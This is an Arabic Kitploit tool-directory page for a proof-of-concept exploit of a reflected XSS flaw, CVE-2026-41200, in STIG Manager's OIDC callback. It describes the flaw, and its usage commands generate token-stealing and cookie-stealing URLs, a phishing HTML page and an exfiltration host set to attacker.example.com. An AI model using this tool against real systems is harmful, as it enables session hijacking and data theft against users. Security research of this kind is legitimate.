Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-41200-stig-manager-oidc-reflected-xss | Kitploit
أدوات/GitHubGitHub/hunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubhunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss

cve-2026-41200-stig-manager-oidc-reflected-xss

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-41200 — STIG Manager OIDC Reflected XSS PoC

إثبات مفهوم مفاهيمي لثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة في إصدارات STIG Manager من 1.5.10 حتى 1.6.7.

ملخص الثغرة

توجد ثغرة XSS منعكسة في كود معالجة أخطاء مصادقة OIDC في تطبيق STIG Manager للويب. تتم كتابة معاملات الاستعلام error و error_description التي يعيدها موفّر OIDC مباشرة إلى DOM عبر innerHTML بدون تهريب HTML. يمكن للمهاجم الذي يستطيع إنشاء URL ضار وإقناع مستخدم بفتحه تنفيذ JavaScript عشوائي في سياق التطبيق.

تكون الثغرة في أشد حالاتها خطورة عندما يكون لدى المستخدم المستهدف جلسة STIG Manager نشطة في علامة تبويب أخرى بالمتصفح — إذ يمكن للكود المحقون التواصل مع SharedWorker الذي يدير رمز الوصول، مما يتيح إجراء طلبات API موثّقة نيابة عن الضحية.

  • CVE: CVE-2026-41200
  • CVSS 4.0: 8.5 (HIGH)
  • المتأثر: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
  • تم التصحيح في: v1.6.8
  • النشرة الأمنية: GHSA-wg33-j3rv-jq72
  • المقال: hunt-benito.com

الاستخدام

root@kitploit:~
# توليد URL ردّ اتصال خبيث (وضع سرقة رمز SharedWorker)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# توليد حمولة بسيطة لسرقة ملفات تعريف الارتباط
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# الإخراج كصفحة HTML للتصيّد
python3 cve-2026-41200-poc.py --format html

# مضيفات API ومضيفات تسريب مخصصة
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com

إخلاء المسؤولية

هذه الأداة مُقدَّمة لأغراض تعليمية وللبحث الأمني المصرّح به فقط.

  • استخدمها فقط ضد الأنظمة التي تملكها أو لديك تفويض صريح لاختبارها.
  • الوصول غير المصرّح به إلى أنظمة الحاسوب غير قانوني في معظم الدول.
  • لا يتحمّل المؤلفون أي مسؤولية عن إساءة استخدام هذه الأداة.
تنزيل الأداة